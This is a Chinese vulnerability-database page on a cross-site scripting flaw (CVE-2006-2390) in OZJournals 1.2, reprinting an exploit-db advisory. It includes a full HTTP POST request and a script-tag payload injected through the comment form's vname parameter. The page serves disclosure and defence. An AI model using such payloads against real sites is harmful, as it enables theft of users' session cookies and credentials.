OZJournals 注释功能 跨站脚本攻击(XSS) 漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110261 漏洞类型 跨站脚本
发布时间 2006-05-12 更新时间 2006-05-16
CVE编号 CVE-2006-2390 CNNVD-ID CNNVD-200605-266
漏洞平台 PHP CVSS评分 5.8
|漏洞来源
https://www.exploit-db.com/exploits/27859
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-266
|漏洞详情
OZJournals1.2存在跨站脚本攻击(XSS)漏洞。远程攻击者可以借助注释功能中的vname参数,注入任意Web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/17954/info

OZJournals is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

OZJournals 1.2 is reported to be vulnerable. Other versions may be affected as well.

# OZJournals 1.2 <= Cross Site Scripting Vulnerability 
#
# Risk: Less critical
# Class: Remote
# Script: OZJournals 1.2
# Version: 1.2

----------------------------------------------------------------------------------------------
Post Request:

http://www.example.com/ozjournals/ozjournals/index.php?show=comments&action=post
POST /ozjournals/ozjournals/index.php?show=comments&action=post HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.example.com/ozjournals/ozjournals/index.php?show=comments&action=add
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
vname=test&vemail=mail%40mail.it&vlocation=test&vcomment=test

ou can insert in the name an XSS code or you can modify the request in this way:

vname=<SCRIPT>alert("lol");</SCRIPT>&vemail=mail%40mail.it&vlocation=test&vcomment=test

----------------------------------------------------------------------------------------------
Credit

Author: Kiki
Site: http://kiki91.altervista.org
IRC Channel: irc.azzurra.org 6667 #system
|参考资料

来源:BID
名称:17954
链接:http://www.securityfocus.com/bid/17954
来源:VUPEN
名称:ADV-2006-1781
链接:http://www.frsirt.com/english/advisories/2006/1781
来源:SECUNIA
名称:20091
链接:http://secunia.com/advisories/20091
来源:MISC
链接:http://kiki91.altervista.org/exploit/ozjournals.txt
来源:XF
名称:ozjournals-vname-xss(26403)
链接:http://xforce.iss.net/xforce/xfdb/26403